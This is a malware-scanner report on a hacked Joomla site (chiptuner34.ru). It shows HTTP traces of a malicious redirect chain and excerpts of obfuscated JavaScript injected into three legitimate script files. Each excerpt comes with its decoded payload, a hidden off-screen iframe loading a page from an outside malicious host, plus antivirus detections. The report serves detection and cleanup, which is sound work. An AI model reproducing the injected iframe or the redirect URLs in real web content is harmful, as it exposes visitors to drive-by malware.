New scan:

Malware Scanner report for chiptuner34.ru

Malicious/Suspicious/Total urls checked
3/0/9
3 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://web-redirect.ru/?web
96 websites infected.
->http://starik.ru/components/com_users/1/index.php


The website "chiptuner34.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.chiptuner34.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.chiptuner34.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 16 Aug 2014 17:41:29 GMT
Pragma: no-cache
Location: http://web-redirect.ru/?web
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 16 Aug 2014 17:41:29 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: _cutt_caches_images=1408210889; expires=Sun, 17-Aug-2014 17:41:29 GMT; path=/
Set-Cookie: e4a5be75c345d3b74877af9ac54ab887=qhu0n26k03g9fg9503pt5fb8n6; path=/
Set-Cookie: iamalive=yes;Path=/;
X-Powered-By: PHP/5.2.17
malicious
URL: http://web-redirect.ru/?web
(imitation of visitor from search engine)

GET /?web HTTP/1.1
Host: web-redirect.ru
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Found
Cache-Control: max-age=0
Connection: close
Date: Sat, 16 Aug 2014 17:38:22 GMT
Pragma: no-cache
Location: http://starik.ru/components/com_users/1/index.php
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Sat, 16 Aug 2014 17:38:22 GMT
X-Powered-By: PHP/5.3.3
suspicious

Scanned pages/files

RequestServer responseStatus
http://www.chiptuner34.ru/
200 OK
Content-Length: 20852
Content-Type: text/html
clean
http://www.chiptuner34.ru/components/com_jcomments/js/jcomments-v2.1.js?v=7
200 OK
Content-Length: 29643
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var inderx = 0;
if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) {
return inderx;
}
return false;
}
function hhh_ristera_au(){
var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS&
... 3434 bytes are skipped ...
e',arguments);},
unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);},
updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}},
go: function(l){window.open(l);return false;}
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src="http://qwant.mirabilisvoyage.ro/gefewtgfdghrhtrj8.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr

http://www.chiptuner34.ru/components/com_jcomments/libraries/joomlatune/ajax.js?v=3
200 OK
Content-Length: 6390
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var inderx = 0;
if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) {
return inderx;
}
return false;
}
function hhh_ristera_au(){
var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS&
... 3631 bytes are skipped ...
br/> case 'al': if(data){alert(data);} break;
case 'js': if(data){eval(data);} break;
default: this.error('Unknown command: ' + cmd);break;
}
}

delete result;
delete cmd;
delete id;
delete property;
delete data;
delete obj;
return true;
};
this.error = function(){};
}
var jtajax = new jtAJAX();
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src="http://qwant.mirabilisvoyage.ro/gefewtgfdghrhtrj8.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr

http://www.chiptuner34.ru/media/system/js/caption.js
200 OK
Content-Length: 4162
Content-Type: application/x-javascript
clean
http://www.chiptuner34.ru/plugins/system/pc_includes/ajax_1.3.js
200 OK
Content-Length: 11146
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var inderx = 0;
if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) {
return inderx;
}
return false;
}
function hhh_ristera_au(){
var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS&
... 3498 bytes are skipped ...
,"&quot;");postData[curLen][j]=new Array(assCheckbox[i],encodeURIComponent(value));tmpIdx++;}}}
else
{if(objCheckbox[0].checked)
{var value=objCheckbox[0].value;value=value.replace(/"/g,"&quot;");postData[postData.length]=new Array(assCheckbox[i],encodeURIComponent(value));}}}}}}
return postData;}}
function jax_iresponse(){jax.processIResponse();}
var jax=new Jax();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V0526
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr

http://vkontakte.ru/js/api/openapi.js?9
200 OK
Content-Length: 64013
Content-Type: application/x-javascript
clean
http://www.chiptuner34.ru//yandex.st/share/share.js/
404 Not Found
Content-Length: 307
Content-Type: text/html
clean
http://www.chiptuner34.ru/test404page.js
404 Not Found
Content-Length: 296
Content-Type: text/html
clean
http://www.chiptuner34.ru//mc.yandex.ru/metrika/watch.js/
404 Not Found
Content-Length: 312
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=chiptuner34.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chiptuner34.ru/

Result: chiptuner34.ru is not infected or malware details are not published yet.